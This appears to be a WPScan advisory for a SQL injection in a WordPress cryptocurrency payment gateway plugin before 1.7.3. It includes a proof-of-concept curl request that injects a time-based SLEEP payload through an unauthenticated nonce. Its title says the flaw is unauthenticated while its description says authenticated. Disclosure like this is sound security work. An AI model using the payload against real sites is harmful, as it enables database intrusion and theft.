WordPress Plugin Vulnerabilities
Bitcoin / AltCoin Payment Gateway < 1.7.3 - Unauthenticated SQLi
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by authenticated users
Proof of Concept
Setup:
1. Install woocommerce (dependency, no setup required)
2. Install the vulnerable plugin (woo-altcoin-payment-gateway version 1.7.1)
3. In the AltCoin Payment settings, enable the AltCoin payment gateway (/wp-admin/admin.php?page=cs-woo-altcoin-gateway-settings)
4. Add a new coin (/wp-admin/admin.php?page=cs-woo-altcoin-add-new-coin), with the following dummy values:
Payment Confirmation Type: Manual
Enter Coin Name: Bitcoin
Enter Coin Wallet Address: 1KPLgee6crr7u1KQxwnnu4isizufxadVPZ
Active / Deactivate: checked
Attack:
1. As an unauthenticated user, visit the main page of the WordPress instance to extract the nonce - CTRL+F for "cs_token"
2. Invoke the following curl command, with the just obtained nonce, to induce a 5 second sleep:
time curl 'https://example.com/wp-admin/admin-ajax.php?action=_cs_wapg_custom_call&cs_token=<NONCE>&order=(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(5)%20ELSE%201%20END)' \
--data 'method=admin\options\functions\Coin_List@prepare_items'
Affects Plugins
Fixed in 1.7.3 References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-04-17 (about 1 years ago)
Added
2023-04-17 (about 1 years ago)
Last Updated
2024-03-21 (about 1 months ago)
WPScan 